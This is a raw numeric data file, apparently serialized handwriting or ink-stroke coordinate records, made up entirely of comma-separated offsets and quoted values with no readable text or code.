1,5 5-1,11 12-11,36 33 1,-36-38 68,-2 0 0,22 28 0,-36-42-15,-1 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,0 1 0,0 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,0 0-1,0 0 1,0 0 0,-1 5 0,0-5-4,0-1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,-5 2 0,-15 3-20,0 0 0,0-1 0,-38 3 0,-10 2-327,67-10 173,0 0 0,-1 0-1,1-1 1,0 1 0,0-1 0,0 0 0,0 0-1,0 0 1,-6-3 0,8 3-297,0 0 0,0 1-1,0-1 1,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,0-1 0,0 1 0,-1-1 0,1 0-1,-1-2 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1236,'0'0'1844,"0"-7"-568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5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12 784,'2'-12'9712,"-1"12"-9518,1 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,0 0-1,1-1 1,-1 1 0,0 0-1,1 0 1,-1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 1 1,1 1 0,9 52 699,-4-15-534,-4-30-254,0 0 0,-1 0 0,0 0 1,-1 1-1,-1 16 0,0-18-25,0 0 0,1 0 1,0 1-1,1-1 0,0 0 0,5 17 1,-5-21-50,0 1 1,0-1 0,0 0 0,-1 1-1,0-1 1,-1 11 0,1-12-20,-1 0-1,1 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 0 1,2 5 0,-2-8-18,0 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 0-1,1 1 0,0-1 0,-1 0 0,1 0 1,-2 2-1,2-2-99,-1-1 0,1 1 0,0-1 0,-1 1 0,1-1 0,0 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,-30-12-9488,21 2 6145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6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0 206 504,'1'-4'437,"0"-1"-1,1 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,1 0 1,0 0-1,-1 1 1,7-7 0,35-36 1881,-34 36-2074,0 0-1,0 1 1,1 0 0,1 1 0,0 0 0,0 1 0,0 0 0,1 1-1,0 0 1,0 1 0,0 0 0,1 2 0,-1-1 0,1 1 0,21-1-1,-32 5-197,1-1-1,-1 1 0,0-1 1,1 1-1,-1 0 1,0 1-1,0-1 0,0 0 1,0 1-1,0 0 0,0-1 1,-1 1-1,1 0 0,0 1 1,-1-1-1,0 0 0,1 1 1,-1-1-1,0 1 1,0 0-1,-1 0 0,1 0 1,0 0-1,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,-1-1 0,1 0 1,-1 1-1,0-1 0,0 0 1,0 1-1,0-1 1,-1 0-1,1 1 0,-1-1 1,-1 4-1,-6 11 426,4-8-232,0 0 0,-1 0 0,1-1 0,-2 0 0,0 0 0,-11 14 0,-16 15 400,27-29-504,-1-1-1,0-1 0,0 1 1,-9 6-1,-3 1 132,16-11-189,-1-1 0,0 0 0,0 0 0,0 0 1,0-1-1,-1 1 0,1-1 0,-1 0 0,-5 2 0,-5 0 289,-24 3 477,52-20-1856,-4 8-125,1 0-1,1 1 0,-1 0 0,1 1 1,-1 0-1,1 1 0,0 0 0,11 0 0,-7 0 388,11-2-1,-26 3 764,0 1 1,1 0 0,-1 0 0,1 0-1,-1 0 1,1 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,0 1 1,1-1 0,-1 0 0,1 0-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0 0 1,1 1 0,-1-1 0,0 0-1,1 1 1,-1-1 0,0 1 0,0-1-1,1 0 1,-1 1 0,0-1 0,0 1-1,45 22 5063,-11-6-3190,-24-14-1540,-1 2 0,0-1 1,0 1-1,15 12 0,30 23 386,-39-26-646,-12-11-82,-1-1 0,1 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,1-1 0,-1 1 0,7 0 0,18 2 153,-20-2-3773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32 103 1332,'0'0'1432,"-9"5"1468,13-4-2583,0 0 0,0 0 0,0 0-1,0-1 1,0 1 0,0-1 0,1 0 0,-1 0 0,0-1 0,8-1 0,41-10 617,-46 11-718,0-1 0,0 1 0,0-2-1,0 1 1,-1-1 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,-1-1 0,7-7 0,-11 12-169,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,0-1 0,-4-5 471,5 5-490,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 0 1,0 0-1,1 1 1,-1-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,-43 9 314,33-4-228,-1 1 1,1 0-1,1 1 1,-1 0-1,1 1 1,1 0-1,0 0 1,-15 19 0,22-25-94,1 1 1,-1-1 0,1 1 0,1-1 0,-1 1-1,0 0 1,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,1 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,1-1 0,2 5-1,-1-2 0,0-1-1,0 0 1,1 0 0,0 0-1,0 0 1,0-1-1,1 1 1,-1-1-1,1 0 1,0 0 0,1-1-1,-1 0 1,0 0-1,1 0 1,0 0-1,8 2 1,0-1-27,0 0 0,0-1-1,0 0 1,1-1 0,-1-1 0,16 0 0,-20-1-534,-1-1 0,1 0 0,0 0 1,0-1-1,16-5 0,-20 4-608,0 0 0,0-1 1,0 1-1,-1-1 0,0 0 0,1-1 0,-1 1 0,6-9 0,0 1-2101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 1092,'0'0'1578,"-19"-6"8693,20 7-10170,0-1 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1-1,0 1 1,0 0 0,-1-1 0,1 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0-1,-1 0 1,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 2-1,7 42 589,-2-10-551,-3-28-116,0 0 0,-1 1 0,0-1 0,0 0 0,-1 13 0,4 28 42,18 62 22,-1-8-69,-18-96-15,-1 1 1,0-1-1,0 1 1,-1 0-1,0 0 1,0 0-1,0 7 1,5-7-34,-3-3-65,-10-3 23,-8-26-1689,12 19 1536,-1 1 0,0 0 0,0-1 0,-1 1 1,1 1-1,-1-1 0,-8-5 0,3 2 161,6 4 37,-56-40 206,39 34 176,18 9-172,-1-1 0,1 1-1,0-1 1,0 0 0,0 0 0,0 0 0,0-1 0,-4-2-1,-4-5 1190,6 3-516,32 6-668,39 4-361,-4 0-3149,1-8-6106,-51 4 6281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48,'-1'0'169,"0"0"0,1 0 0,-1 0 0,1 0 1,-1 1-1,1-1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,-1 1 1,1-1-1,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 1,0 1-1,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0 0 0,8 31 1260,-3-13-499,-4-9-704,2-1 0,-1 1 0,1-1 0,1 0 0,9 18 0,-5-10-80,-2-3-25,-4-11-87,0 1 1,0-1 0,-1 1-1,1 0 1,-1-1 0,0 1-1,0 0 1,0 6-1,-1-9 350,1-7-104,-1 0 0,0 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,-2-6 0,-6-49 285,8 56-525,2 0 1,-1 0 0,0 0 0,1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 0-1,-1 0 1,4-7 0,0-1 36,-5 12-82,0 1-1,1-1 1,-1 0-1,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,1-1-1,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1-1 0,1 1-1,0 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 1-1,2-1 1,41 0-1705,-27 0-1242,0 0-3327,-7 0 3571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1 868,'0'0'136,"0"1"0,0-1-1,0 1 1,0-1 0,0 0 0,0 1-1,0-1 1,-1 1 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 1 0,0-1 0,-1 0-1,1 1 1,0-1 0,-1 0 0,1 1-1,0-1 1,-1 0 0,1 0 0,-1 1-1,1-1 1,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,-1 1 0,1-1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1-1-1,-1 1 1,1 0 0,0 0 0,-1-1-1,1 1 1,-1 0 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,0 1 0,-1-1-1,1 1 1,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1 0,0 1-1,0-1 642,21 32 1764,-20-28-2454,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,1 2 0,7 22 204,1 15-152,-10-38-222,0-1-1,0 1 1,1-1 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,4 3 0,-5 5-1325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32 1104,'-8'-24'7777,"6"16"-5111,10 16-1615,-6-5-1181,0-1-1,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 4 0,0-4-358,-1 0 0,1 0 1,0 0-1,0-1 0,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 0,1 1 1,0-1-1,0 0 0,2 3 0,7 2-2237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39 114 88,'5'-1'621,"1"1"0,-1-1 1,1 0-1,-1-1 0,0 1 0,0-1 0,10-5 0,-6 3-453,-1-1 0,0 0 0,0 0 0,0-1 0,0 0 0,7-9 0,-5 7-39,2-4 560,-12 12-668,0 0 1,0-1-1,0 1 1,0 0-1,0-1 0,0 1 1,0-1-1,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 0,-1-1 1,1 1-1,0 0 1,0-1-1,0 1 1,0 0-1,-1-1 0,1 1 1,0 0-1,0-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,0 0 0,-1 0 1,1-1-1,0 1 1,-1 0-1,1 0 1,-1 0-1,-11-7 822,11 5-696,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-3 1 0,-20 9 1503,22-10-1563,0 0-1,0 0 1,0 0-1,0 1 0,1 0 1,-1-1-1,0 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,0-1 0,0 1 1,-2 3-1,-5 8 106,6-11-163,1 0-1,0 0 0,0 1 0,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,1 0 0,0 0 0,1 0 0,-2 5 0,-1 11 51,2-18-74,1-1-1,0 0 0,-1 1 1,1-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,0 1-1,1-1 0,-1 1 1,0-1-1,0 0 1,1 1-1,-1-1 0,0 0 1,1 1-1,1 1 0,1 13 38,-3-15-39,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,1 0 0,11 10 55,39 28 68,-46-36-294,0 0 0,1 0 0,-1-1 0,1 0 0,0 0 0,0 0 0,0-1 0,13 1-1,18-8-3751,-35 5 3170,0 0 0,0-1 0,0 1-1,-1-1 1,1 1 0,0-1-1,-1 0 1,1 0 0,3-4-1,3 0-1627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24 428,'2'1'6430,"7"5"-5233,-8 3-896,1 0 0,0-1 0,0 1 0,1-1 0,5 13 0,4 11 60,-2-6-59,-8-20-229,1 1 0,-1-1 0,0 1 0,0-1 0,-1 1 0,1 6 0,-2-11-59,0 0 1,0 0-1,1-1 0,-1 1 1,1 0-1,-1 0 1,1-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0-1 1,2 3-1,-2-2-8,0-1 1,0 0-1,0 0 0,0 1 1,0-1-1,0 1 0,-1-1 1,1 0-1,-1 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,0-4 62,0 1 1,0-1-1,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 1 1,1-1-1,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0 1,-1 0-1,1 1 0,0-1 0,22-50 1640,-11 17-1260,-2 2-108,2 0-1,30-56 1,-22 65-2246,-8 14-7785,-3 3 6709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18 170 108,'13'-4'4428,"17"-5"-2357,-10 2-1751,-1-1 0,0 0 0,-1-2 0,1 0 0,-2-1 0,0-1 0,27-23 0,-43 34-272,1 0 0,-1 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1-1 0,1 0 0,0 1-1,-1-1 1,0 0 0,1-1 0,-1 2 71,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 1 0,0-1 0,1 0 0,-1 0-1,0 1 1,-1-2 0,0 1 4,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-1 0 0,1 0-1,1 0 1,-1 0 0,0 1 0,-3 1 0,-60 38 744,11-9-461,49-28-343,-1 0 1,0 0-1,1 1 1,0 0-1,0 0 0,0 0 1,1 0-1,-8 13 1,11-15-50,-1 0 1,1 0 0,0 0 0,0 1 0,0-1-1,1 1 1,-1-1 0,1 1 0,0-1 0,0 1-1,0-1 1,1 0 0,-1 1 0,1-1 0,-1 1-1,1-1 1,0 0 0,1 1 0,1 4 0,-1-6-21,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,1 0 1,-1 0-1,0 0 1,0-1-1,1 0 0,-1 1 1,1-1-1,4 2 1,39 12-153,-42-14 138,5 1-326,1 0 0,0-1 0,0 0 0,0-1 0,-1 0-1,1 0 1,0-1 0,10-2 0,74-22-8394,-71 18 5519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0 424,'0'14'9075,"9"39"-5855,23 112 1001,-28-148-4043,-1 1 1,0 0 0,-2 1-1,0 18 1,10 28-42,-6-47-118,-4-16-13,0 0 1,0 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1-1 1,-1 0-1,0 1 1,0 4-1,0-6-32,-2-31-7025,-9 5 899,2 13 2918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1 168 836,'2'-11'1108,"1"0"-1,1 0 0,0 1 1,0-1-1,1 1 1,1 0-1,9-14 1,-11 18-802,1 1 0,0-1 1,0 1-1,1 0 1,0 0-1,0 0 1,0 1-1,0 0 1,1 0-1,-1 1 1,1 0-1,0 0 0,0 0 1,0 1-1,0 0 1,1 1-1,-1-1 1,0 1-1,8 0 1,-8 1-257,0 0 1,0 1 0,0-1 0,-1 1 0,1 1 0,0-1-1,-1 1 1,1 0 0,-1 1 0,1-1 0,-1 1 0,0 0-1,0 1 1,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,-1 0-1,8 9 1,-7-7-50,0-1 0,-1 1 0,1 0 0,-2 0 0,1 1 0,4 14 0,-7-18 23,-1 0-1,1 1 0,-1-1 0,0 0 0,-1 1 0,1-1 1,-1 1-1,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-4 5 1,2-3 15,0 0 0,0 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1-1 0,0 0 1,-7 3-1,-11 3-195,-1-1 0,-41 8 0,13-3-1796,48-13 2591,-10 1-13252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2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55 152 944,'0'0'3518,"42"18"1509,-2-9-2774,-38-8-2140,1 0-1,-1 0 1,1 0 0,-1-1 0,1 1-1,-1 0 1,1-1 0,-1 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1-1-1,-1 1 1,1-1 0,-1 1 0,1-1-1,-1 0 1,0 0 0,4-3 0,3 0-32,-1 0 0,0-1 0,-1-1 0,1 1 0,-1-1 0,0-1 0,-1 1 0,8-10 0,-13 14-43,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 1 1,0-1-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,-1-4 0,-11-14 807,12 17-796,1 0 0,-1 1 1,0-1-1,0 0 0,0 1 1,-1-1-1,1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1 0 0,1 0 1,-1 0-1,0 0 0,0 0 1,1 0-1,-1 0 1,0 0-1,-3 0 0,-12-3 360,0 0-1,0 2 1,0 0 0,-23 1-1,32 1-359,1 1-1,-1 0 0,0 1 1,1 0-1,0 0 1,-1 1-1,-6 3 0,11-6-41,1 1 0,0 0 0,-1 0 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0-1,1 0 1,-1 0 0,1 1 0,0-1 0,0 0 0,-1 0 0,1 1 0,1-1 0,-2 3 0,-9 39 58,11-32-63,0-4 4,-1-1 1,2 0 0,-1 0-1,1 1 1,2 10-1,-2-17-7,-1 1-1,0-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,1 0-1,-1-1 1,0 1-1,0 0 0,1-1 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,1 0 0,-1 0 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 0,3-1 1,9-2-4,-1 2 1,-1-1 0,1 0 0,0-1 1,-1-1-1,1 0 0,-1 0 0,0-1 0,12-8 1,12-4 19,-31 16-10,0 0 1,-1 0 0,1-1 0,-1 1 0,0-1 0,1 0 0,-1 0 0,0 0 0,4-4 0,12-4 38,-18 10-41,-1 0 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 1 1,-1-1-1,0 0 1,1 0-1,-1 1 1,0-1-1,1 0 1,-1 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,1 0-1,-1 1 1,0-1-1,0 1 1,0 0-1,12 9 30,-11-9-54,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 1 0,1 1 1,-1 0-309,1 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0-1-1,1 0 1,-1 0 0,5 3 0,15 8-8085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13 396,'0'0'1693,"1"-12"6125,1 12-7515,0 1 0,0-1 0,0 0 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,0 0 0,2 3 0,-1 0-80,0 0 0,0 1 0,1-2 0,-1 1 0,1 0 0,0 0 0,5 3 0,12 19 194,-17-22-411,1-1 1,0 1 0,0 0 0,0-1 0,0 0-1,1 0 1,-1 0 0,1-1 0,8 4 0,-7-3-82,3-5-10,-2-2 47,-1 1-78,-1 0 0,1 0 0,-1-1 1,0 0-1,0 0 0,8-8 1,28-31-392,-30 32 622,-10 15 34,-17 30 220,-2 1 58,9-12-141,-2-1 1,-18 29-1,-6 11 190,-28 75-102,54-109-547,6-17-2050,2-24-3534,7-1 1431,-3 9 2910,-1-7-1657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7 68,'0'-7'12284,"-20"27"-10030,-46 107 736,60-115-2851,1 0 0,0 0 0,1 0 0,1 1 1,0 0-1,0 0 0,1-1 0,1 2 1,0 18-1,3-21-121,-1 1 1,2-1 0,-1 0-1,1-1 1,1 1-1,0 0 1,0-1 0,8 11-1,-10-17-64,0-1 0,1 0 1,-1 0-1,1 0 0,0 0 0,0 0 0,0-1 1,0 1-1,0-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0-1 0,0 0 0,0 0 1,0 0-1,6 1 0,-8-2-591,1-1-35,0 1 1,-1-1-1,1 1 0,-1-1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,5-2 0,-6 4-113,10-14-4203,-10 3 2205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91 728,'1'2'302,"-1"0"1,0 0-1,0 0 1,1 0-1,-1 0 0,1 0 1,0 0-1,0-1 1,-1 1-1,1 0 0,0 0 1,1-1-1,0 3 1,25 17 526,-25-20-839,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 0,0 0 1,0-1-1,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0-1 0,1 1 1,-1 0-1,0-1 1,0 1-1,0-1 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0-1 1,0 1-1,-1 0 0,3-2 1,15-14 15,5-8 63,-15 12 90,-8 11-21,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0-1 0,-1 1-1,1-1 1,-1 1 0,1-1 0,-1 0-1,0 1 1,0-1 0,-1-2 0,1 3 8,-1 0-1,1 0 1,-1 1 0,0-1 0,0 0 0,0 1-1,1-1 1,-2 0 0,1 1 0,0-1 0,0 1 0,0 0-1,-1-1 1,1 1 0,0 0 0,-1 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 1 0,0 0 0,1-1-1,-1 1 1,0 0 0,0 0 0,-2 1 0,-1-2-29,1 1 1,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 0 0,1 0 0,-1 0-1,1 0 1,-1 1 0,1 0 0,0 0 0,0 0 0,-5 3 0,-9 9-674,11-8 593,0-1 1,0 2 0,0-1 0,1 1 0,-6 7 0,3 4-3217,6 2-3569,3-15 4001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92 900,'-2'1'131,"1"-1"1,-1 1-1,0 0 0,0 0 1,1 0-1,-1 0 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 1 1,0-1-1,-1 0 0,1 1 1,0 0-1,0-1 0,0 1 0,0 0 1,1-1-1,-1 1 0,0 0 1,1 0-1,-1 0 0,1 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,0 0 0,1 0 0,-1 0 1,1 0-1,0-1 0,0 1 1,-1 0-1,3 2 0,1 8 62,-4-12-190,0 1 1,0-1 0,0 1-1,0-1 1,0 1-1,1-1 1,-1 1 0,0-1-1,0 1 1,0-1 0,0 1-1,1-1 1,-1 1-1,0-1 1,1 1 0,-1-1-1,0 1 1,1-1 0,-1 0-1,0 1 1,1-1-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1 0,1-1-1,19 13 100,-19-12-82,1 1 0,0-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1-1 1,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0-1,1 0 1,-1 0 0,0-1 0,1 1 0,2-2 0,1 0 44,0-1-1,1 0 1,-1-1 0,-1 1 0,1-1 0,0-1 0,-1 1 0,0-1 0,0 1 0,0-2 0,-1 1-1,8-11 1,5-6 491,-15 19-331,-1 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,0 0 0,-1-1 0,1 1 0,0-7 0,-1 5-66,0 4-92,0 0 1,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0-1,-1 0 1,1 0-1,0-1 1,0 1-1,0 1 1,-1-1 0,1 0-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0 0,1 0-1,-1 1 1,0-1-1,0 0 1,1 0-1,-2 0 1,-11-24 2161,11 23-2135,0 0-1,-1 0 1,1 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,-1 1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0 0 1,-5-1-1,2 1-28,2 0 7,-1 0 1,1 0-1,-1 0 0,1 1 1,0-1-1,-1 1 0,1 0 1,0 0-1,0 1 0,-1-1 0,1 1 1,-4 2-1,4-2-8,-25 17 262,27-18-317,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,-1 2 0,-10 26-31,11-28 23,0-1-1,1 1 0,-1-1 0,1 1 0,-1-1 1,1 0-1,0 1 0,-1-1 0,1 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,0 0 0,0 0 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,1 1 0,-1-1 0,1 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1 0 1,1-1-1,68-7 22,-65 6-32,-3 1 11,1 0-1,-1 1 0,0-1 1,0 1-1,1-1 0,-1 1 0,0 0 1,1 0-1,-1 0 0,6 2 1,1-1-21,-6 0 5,0-1-1,0 1 1,-1 0-1,1 0 0,0 1 1,-1-1-1,1 1 1,-1 0-1,4 2 1,-3-2 59,-1 0 0,1 0-1,0 0 1,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,6 1 0,-9-2-77,1 1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,1 2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41 204,'0'-1'2559,"0"2"-1685,0-7 1743,1 7-2491,-1-1 1,0 0 0,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1 0,-1 0-1,1 1 1,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,-1 0 1,1 0-1,0 0 1,-1 0 0,0-1-1,-13 15 831,-16 16-580,21-19-210,5 6 128,3-16-262,0 0-1,0 0 1,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1 0 0,1 1 0,0-1-1,0 0 1,0 0 0,0 1 0,0-1 0,0 2 0,8 40 406,-2-10-376,-6-31-62,0-1 0,0 0 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,2 1 0,0-1 8,-1 0-1,1-1 1,0 1-1,-1-1 1,1 1-1,-1-1 1,1 0 0,0 0-1,-1 0 1,1 0-1,0 0 1,2-1 0,7-2 63,-1 0 1,0 